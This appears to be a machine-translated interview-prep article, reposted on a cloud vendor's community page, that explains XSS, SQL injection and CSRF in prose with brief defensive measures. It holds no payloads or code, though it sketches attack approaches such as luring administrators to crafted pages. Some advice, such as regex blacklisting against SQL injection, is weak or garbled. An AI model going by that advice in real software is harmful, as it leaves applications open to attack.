Web front-End Pen Questions (3)--front-end security issues

Source: Internet
Author: User
Tags form post csrf attack


Cross Site scripting attacks (Scripting), which are not confused with the abbreviations of cascading style sheets (cascading style Sheets, CSS), are abbreviated as XSS for cross-site scripting attacks.

A malicious attacker inserts malicious HTML code into a Web page, and when the user browses to the page, HTML code embedded inside the Web is executed to achieve the special purpose of the malicious attacker.


(1) attacks from within

Mainly refers to the use of the vulnerability of the program itself, the construction of cross-site statements, such as: Dvbbs showerror.asp the existence of cross-site vulnerability.

(2) attacks from outside, mainly refers to the construction of the XSS cross-Site Vulnerability Web page or to find a non-target outside the Web site has a cross-site vulnerability. If we are going to infiltrate a site, we construct a Web page with a cross-site vulnerability, and then construct the cross-site statement, which, by combining other technologies, such as social engineering, will trick the administrator of the target server into opening. 2.SQL Injection

SQL injection: This is done by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request, eventually reaching a malicious SQL command that deceives the server.


(1) Validation of user input through regular expressions, such as whether to include characters with single quotation marks and double "-", or whether there are SQL reserved words

(2) data query through parameterized stored procedures, LINQ to SQL

(3) Parameterized SQL statements


CSRF (Cross-site request forgery cross-site solicitation forgery, also known as "one click Attack" or session riding, usually abbreviated as CSRF or XSRF, is a malicious use of the site. Although it sounds like a cross-site script (XSS), it is very different from XSS and is almost at odds with the way it is attacked.

XSS leverages trusted users within the site, while CSRF leverages trusted sites by disguising requests from trusted users. Compared to XSS attacks, csrf attacks are often less prevalent (and therefore have very few resources to protect against them) and are difficult to guard against, so they are considered more dangerous than XSS.


    1. Compromising websites with user identities
    2. Use the site's trust in user identities
    3. Spoof the user's browser to send an HTTP request to the target site
    4. Alternatively, a GET request can be triggered by an IMG tag, which can be used to implement a CSRF attack.

Precautionary measures:

For Web sites, switching a persisted authorization method (such as a cookie or HTTP authorization) to an instantaneous authorization method (providing a hidden field in each form) will help the site prevent these attacks. A similar approach is to include the secret information in the form, the user-specified code name as a validation outside of the cookie. Another option is to "double-commit" cookies. This method works only with Ajax requests, but it can be used as a global remediation method without changing a large number of form. If an authorized cookie is being read by the JavaScript code before the form post, then the restriction cross-domain rule will be applied. If the server needs to include a request for an authorization cookie in the POST request body or URL, the request must come from a trusted domain because the other domain cannot read the cookie from the trusting domain. Contrary to the usual trust idea, using post instead of the Get method does not provide effective protection. Because JavaScript can use forged post requests. Nonetheless, requests that cause "side effects" to security should always be sent using post. The Post method does not leave the data tail in the Web server and proxy server logs, but the Get method leaves the data tail. Although CSRF is a fundamental issue for Web applications, not a user's problem, users can protect their accounts on websites that lack secure design: By logging out of the site before browsing other sites or by clearing the browser's cookie after the end of the browser session.

Web front-End Pen Questions (3)--front-end security issues

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.